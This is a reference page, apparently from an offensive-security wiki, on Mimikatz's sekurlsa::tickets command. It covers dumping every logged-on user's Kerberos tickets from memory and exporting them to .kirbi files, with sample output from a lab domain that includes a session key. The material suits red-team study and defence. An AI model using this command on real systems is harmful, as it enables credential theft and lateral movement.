tickets
sekurlsa::tickets lists Kerberos tickets belonging to all authenticated users on the target server/workstation. Unlike kerberos::list, sekurlsa uses memory reading and is not subject to key export restrictions. Sekurlsa can also access tickets of others sessions (users). It has the following command line argument:
  • /export: tickets are exported in .kirbi files. They start with user's LUID and group number (0 = TGS, 1 = client ticket(?) and 2 = TGT). The tickets are saved in the current directory.
This command requires elevated privileges (by previously running privilege::debug or by executing Mimikatz as the NT-AUTHORITY\SYSTEM account).
1
mimikatz # sekurlsa::tickets
2
​
3
Authentication Id : 0 ; 697146 (00000000:000aa33a)
4
Session : Service from 0
5
User Name : MediaAdmin$
6
Domain : hacklab
7
Logon Server : DC
8
Logon Time : 10/17/2021 4:22:01 AM
9
SID : S-1-5-21-2725560159-1428537199-2260736313-1427
10
​
11
* Username : MediaAdmin$
12
* Domain : HACKLAB.LOCAL
13
* Password : (null)
14
​
15
Group 0 - Ticket Granting Service
16
​
17
Group 1 - Client Ticket ?
18
​
19
Group 2 - Ticket Granting Ticket
20
[00000000]
21
Start/End/MaxRenew: 10/17/2021 4:22:01 AM ; 10/17/2021 2:22:01 PM ; 10/24/2021 4:22:01 AM
22
Service Name (02) : krbtgt ; HACKLAB.LOCAL ; @ HACKLAB.LOCAL
23
Target Name (02) : krbtgt ; hacklab.local ; @ HACKLAB.LOCAL
24
Client Name (01) : MediaAdmin$ ; @ HACKLAB.LOCAL ( hacklab.local )
25
Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
26
Session Key : 0x00000012 - aes256_hmac
27
1351322f734539c08a78792f642fc4fd4ff8aea1fe3b4a0edf83778b5ed878e9
28
Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...]
Copied!
Last modified 6mo ago
Copy link